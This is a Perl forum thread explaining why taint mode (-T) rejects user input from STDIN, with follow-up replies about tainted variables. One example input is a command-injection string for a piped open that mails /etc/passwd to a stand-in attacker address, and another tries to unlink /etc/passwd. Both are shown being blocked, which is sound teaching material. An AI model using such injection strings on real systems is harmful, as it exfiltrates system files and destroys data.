Re^5: Insecure dependency in open

It's dangerous because it comes from a dirty, untrustworthy, malicious creature (i.e. the user). They can feed in anything they want on STDIN:

$ perl -T -le 'chomp(my $foo = <STDIN>);unlink( $foo ) or die "unlink:
+ $!\n";'      
/etc/passwd
Insecure dependency in unlink while running with -T switch at -e line 
+1, <STDIN> line 1.
$ perl -T -le '$ENV{PATH}="/bin:/usr/bin"; chomp(my $foo = <STDIN>);op
+en( FOO, $foo ) or die "unlink: $!\n";'
mail blackhat@evilhaxor.org -s `uname -n` < /etc/passwd ; cat /dev/nul
+l |
Insecure dependency in piped open while running with -T switch at -e l
+ine 1, <STDIN> line 1.
[download]

If you want to allow this, you have to explicitly validate (by means of some form of untainting) the input; and on your head be it if you do it wrong.

Update: And as to your question about -t STDIN, that shouldn't be a problem because it's testing a property of the handle not using any input from the handle.

$ perl -T -le 'print "tty" if -t STDIN'
tty
[download]

Comment on Re^5: Insecure dependency in open Select or Download Code

Replies are listed 'Best First'.
Re^6: Insecure dependency in open by argv (Pilgrim) on Jan 22, 2007 at 22:07 UTC
Whoops! Completely disregard this post. I thought at the time that perl wasn't even letting me read from STDIN but it is. That changes my recently follow-up question thread, which can now be discarded. (I thought perl wasn't letting me set a variable from STDIN.). Mea culpa. More later... Dan Heller http://www.danheller.com	[reply]
Re^7: Insecure dependency in open by ikegami (Patriarch) on Jan 22, 2007 at 22:27 UTC
I don't yet see how calling `$filename = <STDIN>` is any different than saying `$filename = $ENV{HOME}`. They're not. `>echo "input" \| perl -T -e "use Scalar::Util qw( tainted ); my $var = +<STDIN>; print(tainted($var)?1:0, qq{\n})" 1 >set VAR=input & perl -T -e "use Scalar::Util qw( tainted ); my $var = + $ENV{VAR}; print(tainted($var)?1:0, qq{\n})" 1` [download]	[reply] [d/l] [select]